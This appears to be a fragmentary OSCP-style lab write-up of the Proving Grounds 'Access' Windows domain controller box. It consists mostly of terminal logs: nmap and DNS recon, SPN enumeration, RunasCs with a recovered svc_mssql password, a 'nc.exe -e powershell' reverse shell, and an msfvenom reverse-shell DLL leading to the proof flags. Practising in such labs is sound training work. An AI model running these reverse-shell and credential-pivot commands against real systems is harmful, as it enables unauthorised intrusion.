┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]
└─$ sudo nmap -n -r --min-rate=3500 -sSV -T4 192.168.167.187
[sudo] xavier 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 23:53 CST
Nmap scan report for 192.168.167.187
Host is up (0.17s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-11 15:53:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.97 seconds
Init Access
53-DNS
Zone transfer failed
┌──(xavier㉿kali)-[~]
└─$ dnsrecon -d access.offsec -n 192.168.167.187 -t axfr
[*] Checking for Zone Transfer for access.offsec name servers
[*] Resolving SOA Record
[+] SOA server.access.offsec 192.168.167.187
[*] Resolving NS Records
[*] NS Servers found:
[+] NS server.access.offsec 192.168.167.187
[*] Removing any duplicate NS server IP Addresses...
[*][*] Trying NS server 192.168.167.187
[+] 192.168.167.187 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.167.187] 50217
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> whoami
whoami
access\svc_apache
PS C:\xampp\htdocs\uploads>
PS C:\tmp> dir C:\users\
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/28/2021 3:53 AM Administrator
d-r--- 5/28/2021 3:53 AM Public
d----- 4/8/2022 2:39 AM svc_apache
d----- 4/8/2022 2:40 AM svc_mssql
# Source / credit:
# https://social.technet.microsoft.com/wiki/contents/articles/18996.active-directory-powershell-script-to-list-all-spns-used.aspx
cls
# Search the current domain (empty ADSI path = default naming context) for every object that has at least one SPN set
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(servicePrincipalName=*)"
## You can use this to filter for OU's:
## $results = $search.Findall() | ?{ $_.path -like '*OU=whatever,DC=whatever,DC=whatever*' }
$results = $search.Findall()
foreach ($result in $results) {
    $userEntry = $result.GetDirectoryEntry()
    Write-host "Object Name = " $userEntry.name -backgroundcolor "yellow" -foregroundcolor "black"
    Write-host "DN = " $userEntry.distinguishedName
    Write-host "Object Cat. = " $userEntry.objectCategory
    Write-host "servicePrincipalNames"
    # servicePrincipalName is multi-valued; print each SPN with a running index
    $i = 1
    foreach ($SPN in $userEntry.servicePrincipalName) {
        Write-host "SPN(" $i ") = " $SPN
        $i += 1
    }
    Write-host ""
}
PS C:\tmp> curl https://raw.githubusercontent.com/antonioCoco/RunasCs/master/Invoke-RunasCs.ps1 -o Invoke-RunasCs.ps1
curl https://raw.githubusercontent.com/antonioCoco/RunasCs/master/Invoke-RunasCs.ps1 -o Invoke-RunasCs.ps1
PS C:\tmp> ls
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/11/2024 8:50 AM 498700 1.txt
-a---- 1/11/2024 9:06 AM 0 2.txt
-a---- 1/11/2024 9:38 AM 883 Get-SPN.ps1
-a---- 1/11/2024 9:46 AM 46818 Invoke-Kerberoast.ps1
-a---- 1/11/2024 10:09 AM 88284 Invoke-RunasCs.ps1
-a---- 1/11/2024 8:45 AM 43696 nc.exe
-a---- 1/11/2024 8:49 AM 2029568 winPEASany.exe
PS C:\tmp> import-module ./Invoke-RunasCs.ps1
import-module ./Invoke-RunasCs.ps1
PS C:\tmp> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
access\svc_mssql
PS C:\tmp> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\tmp\nc.exe 192.168.45.169 7777 -e powershell"
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\tmp\nc.exe 192.168.45.169 7777 -e powershell"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
PS C:\Windows\system32> cd C:\users\svc_mssql\Desktop\
cd C:\users\svc_mssql\Desktop\
PS C:\users\svc_mssql\Desktop> cat local.txt
cat local.txt
ac7cd92298a3ec65de98ea4c51f9e95e
PrivE
Gather information again.
The current user's privileges are as follows:
PS C:\tmp> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.169 LPORT=4444 -f dll -o tzres.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.167.187] 50960
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
C:\Windows\system32>cd C:\users\administrator\desktop\
cd C:\users\administrator\desktop\
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
d0be636ebf08cd4c91a276012f25a135